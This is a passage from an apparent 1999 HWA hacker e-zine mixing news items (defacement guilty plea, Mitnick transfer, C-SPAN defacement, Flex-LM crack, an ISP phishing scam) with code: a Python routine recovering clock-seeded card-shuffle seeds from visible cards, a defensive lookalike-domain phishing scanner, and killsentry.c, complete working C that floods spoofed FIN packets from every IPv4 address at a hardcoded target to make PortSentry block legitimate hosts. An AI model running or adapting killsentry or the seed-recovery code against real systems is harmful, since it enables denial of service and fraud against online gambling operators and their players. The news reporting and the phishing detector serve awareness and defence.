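    """Upper bound on deck entropy: (clock-seeded, ideal shuffle)."""
    return math.log2(MS_PER_DAY), math.log2(math.factorial(52))


if __name__ == "__main__":
    true_seed = 45_296_123                        # constructed: 12:34:56.123
    deck = clock_seeded_deck(true_seed)
    seen = {p: deck[p] for p in (0, 1, 6, 7, 8)}  # constructed positions
    found = consistent_seeds(seen, true_seed + 1_500, 2_000)
    print("seeds consistent with five visible cards:", found)
    print("entropy bits (weak, ideal): %.1f, %.1f" % shuffle_entropy_bits())
```

The same check works as a regression test for a shuffle routine: if a small set of candidate seeds can reproduce an observed deal, the generator or its seeding is not fit for the purpose.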
At Reliable Software Technologies, our mission in the Software Security Group is to stamp out insecure code before it is placed in service. Members of the group involved with the Gambling exploit are: Brad Arkin, Frank Hill, Scott Marks, Matt Schmid, and TJ Walls. The Software Security Group is led by Dr.Gary McGraw. Matt Schmid Reliable Software Technologies mschmid@rstcorp.com @HWA 05.0 Zyklon Pleads Guilty ~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Weld Pond Zyklon (Eric Burns) has pleaded guilty to charges of defacing the web pages of NATO, Vice President Al Gore, and the United States Information Agency (USIA). Zyklon also admitted that he advised others on how to attack www.whitehouse.gov last May. Zyklon faces a maximum of five years in prison and a $250,000 fine, and possible restitution. His sentencing is scheduled for November 19, 1999. C|Net http://www.news.com/News/Item/Textonly/0,25,41358,00.html?pfv Cracker admits to invading government Web sites By Reuters Special to CNET News.com September 7, 1999, 3:05 p.m. PT URL: http://www.news.com/News/Item/0,4,41358,00.html WASHINGTON--A 19-year-old computer cracker with the screen name "Zyklon" pleaded guilty today to attacks involving Web pages for NATO, Vice President Al Gore, and the United States Information Agency (USIA), prosecutors said. Prosecutors from the U.S. Attorney's Office said Eric Burns of Shoreline, Washington, also admitted in federal court in Alexandria, Virginia, that he had advised others on how to attack the White House Web site in May. They said Burns faces a maximum possible punishment of five years in prison and a $250,000 fine, and he could have to pay restitution. His sentencing is scheduled for November 19 before U.S. District Judge James Cacheris. Burns acknowledged that the computer intrusions caused damages exceeding $40,000, the prosecutors said. He admitted to cracking computers in Virginia, Washington state, London, and Washington, D.C. 
Prosecutors said Burns designed a program called "Web bandit" to identify computers on the Internet vulnerable to attack. He found that the computer server at Electric Press in Reston, Virginia, was vulnerable and attacked it four times between August 1998 and January 1999, they said. Electric Press hosted the Web pages for NATO, the vice president, and USIA. Prosecutors said the attacks affected U.S. embassy and consulate Web sites, which depended on the USIA for information. One attack resulted in the closing down of the USIA Web site for eight days, they said. Prosecutors said Burns attacked the Web pages of about 80 businesses whose pages were hosted by Laser.Net in Fairfax, Virginia; the Web pages of two corporate clients of Issue Dynamics in Virginia and Washington, D.C.; and the University of Washington Web page. They said Burns also attacked an Internet service provider in London. Burns usually replaced the Web pages with his own, which often made references to "Zyklon" and his love for a woman named "Crystal," they said. The prosecutors said there was an attempt to replace the White House Web page with one referring to "Zyklon" and "Crystal" in May. The White House was forced to shut down the page for two days, and the computer system was reconfigured. Although Burns took credit for the attack during an Internet chat session, he told the judge he simply had provided advice to others on how to do it, the prosecutors said. Story Copyright © 1999 Reuters Limited. All rights reserved. Wired; http://www.wired.com/news/print_version/email/explode-infobeat/politics/story/21625.html?wnpg=all NATO Cracker Pleads Guilty Reuters 3:00 a.m. 8.Sep.99.PDT A 19-year-old computer hacker with the screen name "Zyklon" pleaded guilty Tuesday to attacks involving Web pages for NATO, Vice President Al Gore, and the United States Information Agency, prosecutors said. 
Prosecutors from the US Attorney's Office said Eric Burns of Shoreline, Washington, also admitted in federal court in Virginia that he advised others on how to attack the White House Web site in May. They said Burns faced a maximum possible punishment of five years in prison, a US$250,000 fine and having to pay restitution. His sentencing was scheduled for 19 November before US District Judge James Cacheris. Burns acknowledged the computer intrusions had caused damages exceeding $40,000, the prosecutors said. He also admitted that he had hacked and damaged computers in Washington, Virginia, Washington state, and London. Prosecutors said Burns designed a program called "Web bandit" to identify computers on the Internet vulnerable to attack. He found that the computer server at Electric Press in Reston, Virginia, was vulnerable and attacked it four times between August 1998 and January 1999, they said. Electric Press hosted the Web pages for NATO, the vice president, and the USIA. Prosecutors said the attacks affected embassy and consular Web sites, which depend on the USIA for information. One attack resulted in the closing down of the USIA Web site for eight days. Prosecutors said Burns also attacked the Web pages of about 80 businesses whose pages were hosted by Laser.Net in Fairfax, Virginia. There were further attacks on the Web pages of two corporate clients of Issue Dynamics in Virginia and Washington, as well as the University of Washington Web page. Prosecutors said Burns also ranged overseas, hitting an Internet service provider in London. Burns usually replaced the Web pages with his own, which often made references to "Zyklon" and his love for a woman named "Crystal," they said. The prosecutors said there was an attempt to replace the White House Web page with one referring to "Zyklon" and "Crystal" in May. The White House was forced to shut down the page for two days and the computer system was reconfigured. Copyright 1999 Reuters Limited. 
@HWA 06.0 Mitnick Transferred to Lompoc Federal Prison ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by punkis Kevin Mitnick has finally been transferred to the facility where he will spend the remainder of his sentence. It was hoped that he would be sent to the Nellis Federal Prison Camp, where living and working conditions would be a little better than what he's lived with for the past four and a half years he spent awaiting trial. He would also be closer to his mother and grandmother. Unfortunately he has been sent to Lompoc Federal Correctional Institution. Free Kevin http://www.freekevin.com Bureau of Prisons http://www.bop.com @HWA 07.0 C-Span Web Site Defaced ~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Wolf D The cable TV network C-SPAN, which broadcasts House and Senate proceedings and other public affairs programming, had its web page defaced by a group known as the 'United Loan Gunmen'. CNN http://www.cnn.com/TECH/computing/9909/05/cspan.hacked.ap/ CMP TechWeb http://www.techweb.com/wire/story/TWB19990906S0002 Associated Press - Via Yahoo http://dailynews.yahoo.com/h/ap/19990905/tc/c_span_hacked_2.html HNN Cracked Pages Archive http://www.hackernews.com/archive/crackarch.html CNN; Hackers hit Web site of C-SPAN September 6, 1999 Web posted at: 2:10 a.m. EDT (0610 GMT) WASHINGTON (AP) -- Hackers vandalized the Internet site of the C-SPAN cable network Sunday, replacing its Web page with a bizarre note that included lyrics from a punk rock band. The hackers, calling themselves "United Loan Gunmen," also claimed responsibility for the defacement of the Internet site for ABC just weeks ago. The group is believed to be relatively newly formed, and its only known attacks have been the ones against C-SPAN and ABC. Officials at C-SPAN, the public affairs cable network that broadcasts House and Senate proceedings and other public affairs programming, could not be reached Sunday night. 
The C-SPAN site has since been repaired. The Web site for C-SPAN was temporarily replaced with a black page carrying the logo for the hacker group. It also included lyrics from a song by the punk band, Dead Kennedys, that purports to be a conversation between a U.S. government official and the leader of a Middle Eastern country. The defacement against C-SPAN was first reported on a Web site, Attrition.Org, which tracks hacking efforts on the Internet. The Attrition site contains a mirror of the hacked version. Copyright 1999 The Associated Press. All rights reserved. This material may not be published, broadcast, rewritten, or redistributed. CMP; Crackers Deface C-SPAN Website By Guy Middleton, TechWeb Sep 6, 1999 (5:26 AM) URL: http://www.techweb.com/wire/story/TWB19990906S0002 Crackers have defaced the Website of U.S. cable tv channel C-SPAN, according to the Associated Press. The crackers, who dubbed themselves the "United Loan Gunmen" (ULG) posted a transcript of a Dead Kennedys song on the site, which contained a fictional discussion between a U.S. government official and a Middle Eastern politician. The ULG presented the transcript as real and said it was discovered, encrypted, on C-SPAN's network. Associated Press; Sunday September 5 11:38 PM ET Hackers Vandalize C-Span Web Site WASHINGTON (AP) - Hackers vandalized the Internet site of the C-SPAN cable network Sunday, replacing its Web page with a bizarre note that included lyrics from a punk rock band. The hackers, calling themselves ``United Loan Gunmen,'' also claimed responsibility for the defacement of the Internet site for ABC just weeks ago. The group is believed to be relatively newly formed, and its only known attacks have been the ones against C-SPAN and ABC. Officials at C-SPAN, the public affairs cable network that broadcasts House and Senate proceedings and other public affairs programming, could not be reached Sunday night. 
The Web site for C-SPAN was temporarily replaced with a black page carrying the logo for the hacker group. It also included lyrics from a song by the punk band, Dead Kennedys, that purports to be a conversation between a U.S. government official and the leader of a Middle Eastern country. The defacement against C-SPAN was first reported on a Web site, Attrition.Org, which tracks hacking efforts on the Internet. @HWA 08.0 killsentry.c a Port Sentry killer ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by the author via wyze1, this piece of code will crash Port Sentry a common internet firewall program. - Ed /* killsentry.c (c) 1999 Vortexia / Andrew Alston Excuse the crappy coding, this code was written when I was very bored, had nothing better to do, and felt like proving the point that automatic firewalling is a bad idea. The code spoofs FIN packets from sequential internet hosts, starting at 1.0.0.0 and going right through to 255.255.255.255, sending 15 packets from each, one packet each to port 100 to 115. Feel free to modify this code, if you use the code for anything, please give me credit where it is due. I hold no responsibility for anything this code is used for, I give no guarantees that this code works, and I hold no responsibility for anything this code does to any system you run it on. If you screw up with it, its your problem, not mine. The code compiles 100% fine with no warnings on FreeBSD 3.2, I dont know about any other platforms or systems. 
Greets and shoutouts: Wyze1 - Thanks for the moral support, here is something you may use in Forbidden Knowledge Sniper - My partner in crime, you rock Timewiz - What can I say, thanks for ideas for projects still coming Moe1 - For all the information Ive had from you - Its appreciated Uglykidjoe - For things said and done - I owe you Hotmetal - A general greet Bretton Vine - Dont worry the underground you hate so much still loves you Everyone else in #hack on irc.electrocity.com - You guys rock Curses, fuckoffs, and the like - Logik - Get a clue, skript kiddie life aint the way Gaspode - I dont think I even need this - a major FUCK YOU and I hope you get castrated with a rusty spoon - take your god like attitude and shove it up your ass Sunflower - May you fall pregnant to one of the many ircops you screw Anyone else that I dislike but cant think of right now - FUCK YOU Anyone who dislikes me - FUCK YOU */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include int main(int argc, char *argv[]) { #define TARGETHOST "209.212.100.196" int octet1, octet2, octet3, octet4; int i; int sock; int on = 1; struct sockaddr_in sockstruct; struct ip *iphead; struct tcphdr *tcphead; char ipkill[20]; char evilpacket[sizeof(struct ip) + sizeof(struct tcphdr)]; struct in_addr spoof, target; int seq, ack; bzero(&evilpacket, sizeof(evilpacket)); // Very bad way to generate sequence numbers srand(getpid()); seq = rand()%time(NULL); ack = rand()%time(NULL); if(argc < 2) { printf("Usage: %s target_host\n",argv[0]); exit(-1); }; target.s_addr=inet_addr(TARGETHOST); if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("socket"); exit(-1); } if(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)) < 0) { perror("setsockopt"); exit(-1); } sockstruct.sin_family = AF_INET; iphead = (struct ip *)evilpacket; tcphead = (struct tcphdr *)(evilpacket + sizeof(struct ip)); iphead->ip_hl = 5; iphead->ip_v = 4; 
iphead->ip_len = sizeof(struct ip) + sizeof(struct tcphdr); iphead->ip_id = htons(getpid()); iphead->ip_ttl = 255; iphead->ip_p = IPPROTO_TCP; iphead->ip_dst = target; iphead->ip_sum = 0; iphead->ip_tos = 0; iphead->ip_off = 0; tcphead->th_sport = htons(80); tcphead->th_seq = htonl(seq); tcphead->th_ack = htonl(ack); tcphead->th_win = htons(512); tcphead->th_flags = TH_FIN; tcphead->th_off = 0x50; for(octet1 = 1; octet1 <= 255; octet1++) for(octet2 = 0; octet2 <= 255; octet2++) for(octet3 = 0; octet3 <= 255; octet3++) for(octet4 = 0; octet4 <= 255; octet4++) { bzero(ipkill, 20); sprintf(ipkill, "%d.%d.%d.%d", octet1, octet2, octet3, octet4); for(i = 100; i <= 115; i++) { tcphead->th_dport = htons(i); sockstruct.sin_port = htons(i); spoof.s_addr = inet_addr(ipkill); iphead->ip_src = spoof; sockstruct.sin_addr = spoof; sendto(sock,&evilpacket,sizeof(evilpacket),0x0,(struct sockaddr *)&sockstruct, sizeof(sockstruct)); } } return(1); };

@HWA

09.0 W. Richard Stevens dead at 48
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

W. Richard Stevens - Dead at 48

contributed by evil wench

W. Richard Stevens, noted technology author and teacher, died last Wednesday. Stevens was best known for his UNIX Network Programming series and TCP/IP Illustrated book. The family has asked that in lieu of flowers, donations be made in Richard's name to Habitat for Humanity, 2950 E. 22nd Street, Tucson, AZ 85713. He is survived by his wife and three children. The cause of death was not reported.
Big Deal Classifieds - His Obituary http://www.bigdealclassifieds.com/classified/plsql/classlevel3_step?wClass=0002&wPubdate=Friday&wRowstart=2&wLessOrMore= Habitat for Humanity http://www.habitat.org/ Some books written by Richard Stevens: TCP/IP Illustrated, Volume 1 : The Protocols Unix Network Programming : Networking Apis: Sockets and Xti (Volume 1) UNIX Network Programming: Interprocess Communications (Volume 2) Advanced Programming in the Unix Environment Unix Network Programming @HWA 10.0 New Palm Pilot RedBox for Canada is Released ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Hack.Canada Cyb0rg/asm has released a new, stand-alone version of RedPalm, a Canadian Red Box for the Palm Pilot. This revision corrects timing issues related to processor clock speed on the newer Pilots, as well as featuring quarter, dime, and nickel tones and a snazzy new interface. (This will not work in the US or most other countries due to differences in the types of tones the various phone systems use.) Hack Canada http://www.hackcanada.com/homegrown @HWA 11.0 Windows2000test Suffers Attack ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Weld Pond A poison packet attack directed against window2000test.com has been claimed to have been successful by the perpetrators. Microsoft claims the server withstood the attack and manually disabled the attackers. (Why are people wasting their time with this? Go do something useful.) C|Net http://www.news.com/News/Item/Textonly/0,25,41287,00.html?pfv Hackers answer Microsoft's Windows 2000 dare By Stephen Shankland Staff Writer, CNET News.com September 3, 1999, 12:55 p.m. PT URL: http://www.news.com/News/Item/0,4,41287,00.html Hackers have answered Microsoft's dare and disabled part of a Windows 2000 server, but both sides are claiming victory. 

A group of hackers say they disabled part of the server that Microsoft put on the Web as a test for those who think they can breach the system's security.

Two attacks that took down the guest book section of the Windows 2000 Beta Internet Test Site took place yesterday. The group sent "poison packets" to the server. The packets masqueraded as small chunks of information but actually were quite large, said George Davey, a leader of the effort.

Microsoft confirmed the attack, saying technicians manually disconnected the attackers.

While the server's CPU was working to swallow the larger-than-expected data packets, the guest book page was inaccessible. However, the overall system didn't crash and the attackers didn't seize control, said Keith White, director of marketing for Microsoft's business and enterprise division.

CNET News.com verified that the guest book didn't appear during one of the attacks yesterday, returning the error message "There is a problem with the page you are trying to reach and it cannot be displayed... Internal server error."

Computer security is an increasingly important field as companies move more services to the Internet, often with publicly accessible Web sites that allow visitors to interact with corporate computers. Microsoft wants to make Windows 2000 "the most secure version of Windows ever, both in terms of feature functionality, and system design," the Web site says.

Microsoft's site has "ground rules" that exhort would-be attackers to "find the interesting 'magic bullet' that will bring the machine down" and see if they can find "hidden messages sprinkled around the computer."

Both sides declared victory. Davey said his group succeeded in getting past some of the computer's defenses, and Microsoft said it succeeded in keeping the machine running and finding new vulnerabilities to address.

"This is exactly what we want customers to do with this site," White said.

Shortly after the test site went up, the same server was taken down by a lightning storm, but Microsoft also acknowledged at the time that the guest book program had been compromised.

Since the site was switched on a month ago, Microsoft has found and fixed four bugs in how the server handles Internet information, White said. An attacker crashed the machine August 17, Microsoft said.

Tests only moderately useful

Putting a server up for would-be attackers to pound on allows companies to find new security holes, but "a lot of these challenges are more to help the perception that the machine is secure," said Christopher Klaus, chief technology officer of Internet Security Systems.

The most serious computer crackers won't participate in such challenges because they don't want to show their hand, Klaus said.

"Some people who know how to break in may not want to disclose all their secrets," Klaus said. "If a robber has a master key to break into every building in the world, he's not going to go to the FBI and demonstrate."

Windows NT and 2000, as well as Unix and other operating systems, aren't particularly secure unless set up properly, Klaus said. "Most systems out there by default are wide open in terms of security issues," he said, but "can be made pretty secure if configured properly and locked down."

More dangerous today are the software applications that reside on top of the operating system. E-commerce has raised a host of new problems because it involves many applications, Klaus said. "Most hackers simply go around it by going through the application layer. As we're seeing e-commerce take off, the hacker's target isn't a small bull's-eye."

Attacking the Web server

The attacks on the Microsoft server yesterday came through the Active Server Pages (ASP) component of Microsoft's Internet Information Services (IIS) Web server software, Davey said.

In testing the attack on his own Windows 2000 servers, he said restarting the server didn't fix the problem; instead, the IIS software had to be reinstalled. Also on the test server, the attack caused the computer's CPU usage to jump to 100 percent. On the Microsoft site, the computer returned to normal once the access was shut down.

"Most people don't have the expertise to selectively shut off [specific Internet addresses] like that," Davey said today. "Had they not shut us off, it would have killed their machine."

Davey thought it notable that the Microsoft server initially made no mention of the ASP problems. "Why don't you guys mention any of the ASP downtime that we have documented?" he asked in an email to Microsoft.

Notification of the attack appeared on the Web site at 10 a.m. today, after CNET News.com called Microsoft about the attack.

The machine is running a beta, or test version, of Windows 2000, on a Pentium III chip with 256 MB of memory.

The machine has been configured to make access difficult, Davey and Microsoft said. However, as the test continues, the company likely will open up more access channels known as "ports" to test it more heavily.

Davey said the challenge of breaking into the system is fun. "Normally, you can't hack, because it's illegal."

He praised Windows 2000 as "by far the best thing ever released by Microsoft." But there's still room for improvement. "All these open holes that get shut up will lead to a more secure server," Davey said.

@HWA

12.0 Flex-LM Security Breached
     ~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by Arik

A security hole has been found in Globetrotter Software Inc.'s Flex-LM, a software package used to prevent pirating of electronic design automation (EDA) tools. The breach allows end users to generate keys to bypass the software's copy protection schemes. Some EDA tools retail for upwards of $44,000 per user.

Electronic News
http://www.electronicnews.com/enews/news/1229-246NewsDetail.asp

Hackers compromise software used to protect EDA tools

Sep 03, 1999 --- A group of hackers have compromised Globetrotter Software Inc.'s Flex-LM, a software package used by electronic design automation (EDA) tools providers to protect software tools licensed to end-users.

EDA industry veteran John Cooley, who was informed of the hack by a colleague, reported the incident this afternoon in ESNUG, his EDA industry newsletter. Only limited details related to the nature of the hack were posted due to its pervasive nature. Virtually all of the EDA vendors license their software using Globetrotter's Flex-LM.

The software breach has been posted to an undisclosed Web site that offers free downloads. Another Web site provides tutorials for using the cracked code. With some tools costing $44,000 plus per seat, the "free" key carries a heavy toll.

The 6 Meg download allows its users to generate keys that open any Windows-NT based EDA software package to end-users. Essentially, the software renders any existing or protected evaluation copy into a "free" copy by allowing the user to key into the software indefinitely.

The networking of NT and UNIX systems probably means this crack could enable the "free" use of UNIX based EDA tools, Cooley said.

Cooley did not disclose the site, offering instead to inform authentic EDA company representatives of its whereabouts. Since posting the news this afternoon, the EDA veteran said he has received more than 48 emails from EDA vendors either confirming the hack or requesting more information about the break in Flex-LM.

Globetrotter representatives could not be reached for comment by press time.

@HWA

13.0 Customers of Numerous ISPs Victims of Fraud
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by Dark VVulf

A new and interesting form of fraud has appeared around the net.
It works like this: a new but similar web site is set up, then the ISP's user base is spammed telling them that their accounts are overdue. The email directs the users to the fake web site and asks them to reenter their credit card information. The users then find large charges on their credit card bills. At least three ISPs have been hit with this scam.

Wired
http://www.wired.com/news/news/technology/story/21572.html

New Web Scam Attacks ISPs
by Chris Oakes

3:00 a.m. 3.Sep.99.PDT

"According to our records, your payment for your Internet access account is late. Perhaps you overlooked it? ...It is very important that you contact us as soon as possible. To update your account information, please go to http://www.valuehelp.net."

Oh, and once you get there, we'll rob you blind.

Customers of California ISP Value Net received such a message this week, signed by "Sheila Baker, Administrative Assistant."

Problem was, it was a scam. ISP abuse experts and the Secret Service say it looks like a new and sophisticated brand of Web scam that is bound to get worse.

"It's particularly scary because of the nature of it. It all looks real, and it's easy to perpetrate," said Patrick Greenwell, an Internet consultant who's seen all types of electronic spams and scams come and go.

Value Net president Tom Fawcett said at least one of the customers who visited the site entered a credit card number. After Value Net alerted him to the fraud, the customer discovered a substantial unauthorized charge on his account.

"When you go to that Web site, a dialog first comes up and says you are entering a secure Web site at Value Net. You're not -- but it says you are," said Fawcett. "They went to a lot of work to make it appear legitimate."

The spoof site uses a closely related domain name -- in this case, valuehelp.net, a convincing spin on value.net. Once there, users encountered a form telling them to re-enter their email, name, address, credit card information, and more.

Fawcett wasn't sure how many Value Net customers had responded to the email. But he said the ISP received 30 responses to its scam alert notice warning customers not to respond to the phony instructions.

The fraudulent site was still operational Thursday morning, but the New Jersey-based service provider hosting the domain shut the site down by the end of the day.

Value Net is not the first ISP to encounter such a scam. Peter Veeck, a network administration consultant for Sherman, Texas, ISP Internet Texoma reported that his customers were targeted by a similar fraudulent email in July. One other ISP also confirmed it had been targeted by the same type of fraud, but declined to go on record.

Internet Texoma customers were instructed to send their credit card numbers to an address at a free Web-based email service.

"There were only about four [customers] that responded," Veeck said. "We caught it pretty quickly."

The practice has early roots in scams targeting America Online members several years ago. Though sometimes successful, these scams often had telltale flaws, however, such as obviously fishy return email and Web addresses and crude site mock-ups.

The sophistication of the scam perpetrated on Value Net customers represents an alarming refinement of the technique to Internet abuse experts.

It also appears to be targeting more mom-and-pop ISPs, rather than just AOL.

Value Net's Fawcett stressed that his customers were also alerted -- and protected -- within half an hour of the fraudulent email transmission Wednesday. Value Net customers attempting to visit the URL were redirected to a page containing a warning about the scam.

When Fawcett contacted 9 Net Avenue, the fraudulent site's host ISP, the service told him they would not shut the offending down without a court order.

So Fawcett turned to the FBI. Since the matter involved credit card fraud, the FBI directed him to the Secret Service, which took prompt action.

"We looked at Mr.
Fawcett's Web site and compared it to the one that this illegitimate company had set up ... and we were able to match the link to a person down in San Diego who's operating this illegal Web site," said Andrew Dengler, special agent for the San Francisco field office of the Secret Service.

Dengler said the San Diego branch of the Secret Service has launched an investigation into the registered domain holder.

The Value Net scam was the first for his field office, Dengler said. But he expects more. So do Veeck and Fawcett.

"I'm positive that in the next couple of months we're going to see more of this kind of activity," Dengler said. "And I'm optimistic we're going to see more laws passed to help us deal with it."

Meanwhile, Fawcett wasn't happy that it took Secret Service involvement to get 9 Net Avenue to act to solve the problem before it wreaked havoc on his customers' credit card accounts.

"Most ISPs cooperate and get people to take it down or modify the site," Fawcett said. "But these guys at 9 Net Avenue, they just stiff-armed us."

Patrick McGilloway, director of client services for 9 Net Avenue, said the ISP was just following due process to ensure the complaint was legitimate.

"Of course, Tom and Value Net wanted to make sure it was shut off the moment he complained, and we had to make sure who we were dealing with."

The Secret Service's Dengler agreed that 9 Net Avenue wasn't necessarily wrong to say it needed a court order.

"They were just covering themselves legally.... It's something that's very new right now for the legal and prosecutorial community."

Veeck, of Internet Texoma, doesn't necessarily agree that more laws are the solution.

"If we as denizens of the Internet have to resort to law enforcement, then we give law enforcement control over the Internet. Is that something we want to do? ...Law enforcement should be involved. But the ISPs and everybody needs to work together when they can."
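
The scam above depends on a domain that reads like the ISP's own (valuehelp.net against value.net). The following is an added example, not part of the Wired article or of this zine: a mail-side check that flags links whose domain imitates the provider's. The function names, the two-label domain split and the one-edit threshold are assumptions, and the sample mail is constructed around the sentence quoted in the article.

```python
import re
from urllib.parse import urlsplit

# The ISP's real domain, taken from the article. Everything else is assumed.
OWN_DOMAINS = {"value.net"}
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)


def registrable(host):
    """Last two labels of a host name (assumption: no public-suffix list,
    which is adequate for plain .net/.com names like the ones here)."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def edit_distance(a, b):
    """Levenshtein distance, computed one row at a time."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_reason(domain, own):
    """Return why `domain` imitates `own`, or None if it does not."""
    if domain == own:
        return None
    name, own_name = domain.split(".")[0], own.split(".")[0]
    if own_name in name:
        return "embeds the brand label '%s'" % own_name
    if edit_distance(name, own_name) <= 1:
        return "one edit away from '%s'" % own_name
    return None


def scan_message(text):
    """List (url, domain, reason) for every link that imitates an own domain."""
    hits = []
    for url in URL_RE.findall(text):
        host = urlsplit(url).hostname
        if not host:
            continue
        domain = registrable(host)
        for own in OWN_DOMAINS:
            reason = lookalike_reason(domain, own)
            if reason:
                hits.append((url, domain, reason))
    return hits


# Constructed sample: the valuehelp.net link is the one quoted in the
# article; the other three links are made up to exercise the checks.
SAMPLE_MAIL = """According to our records, your payment for your Internet access
account is late. To update your account information, please go to
http://www.valuehelp.net. The real support page is http://www.value.net/support
and the story ran at http://www.wired.com/news/ while http://va1ue.net/pay
is a constructed near-miss spelling."""

if __name__ == "__main__":
    for url, domain, reason in scan_message(SAMPLE_MAIL):
        print(domain, "->", reason)
```

The heuristic is deliberately coarse: it will also flag unrelated domains that happen to contain the brand word, so its output is a review queue for the abuse desk rather than a block list.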

@HWA

14.0 Air Force Asks to Preserve 'Panther Den'
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by Weld Pond

The Air Force has asked House and Senate appropriators to restore almost $500,000 recently cut from the FY 2000 budget. The monies were earmarked for a highly classified program to protect military computer networks from electronic attacks. The program is known as the 'Panther Den'. Further details on 'Panther Den' are unavailable due to its classified nature.

JYA.com - originally from 'Inside the Air Force'
http://jya.com/af-bio-bt.htm

Inside the Air Force, September 3, 1999

Money to be used for information security

AIR FORCE ASKS APPROPRIATORS TO PRESERVE FY-00 'PANTHER DEN' SPENDING

Richard Lardner

The Air Force has called on House and Senate appropriators to restore nearly $500,000 to a highly classified program the service maintains is a key part of its overarching effort to protect military computer networks from electronic attacks.

While the amount of money at issue is modest when compared to other programs, an Air Force "budget/program fact paper" shipped to Capitol Hill and obtained by Inside the Air Force claims serious problems will result if the funding is left out of the fiscal year 2000 defense spending bill.

"Eliminating this funding line would entirely halt the planned development of sophisticated techniques and technologies for defending systems against sophisticated information warfare and computer network attacks that are beyond commercially available protection systems," the appeal reads.

In its FY-00 spending request, the Air Force sought $491,000 in research and development spending for the special access program, known as Panther Den. While Senate provided the requested amount in its FY-00 defense appropriations package, House appropriators did not, citing a desire to eliminate or consolidate budget line items with less than $1 million in funding.

But the appeal paper charges the House appropriations position is shortsighted.

"The House position, which implies the $0.5 million is used for 'legacy programs that have long since transitioned from development to production to fielding,' should not apply to this program," the paper reads. "This innovative project line is in its infancy in the emerging computer network defense field. . . . This program funds research and development in the Panther Den [SAP] which develops sensitive information operations technologies for the purpose of achieving information superiority," the document adds.

According to the fact paper, the Air Force planned to double the annual funding level for Panther Den to $1 million per year beginning in FY-01. The service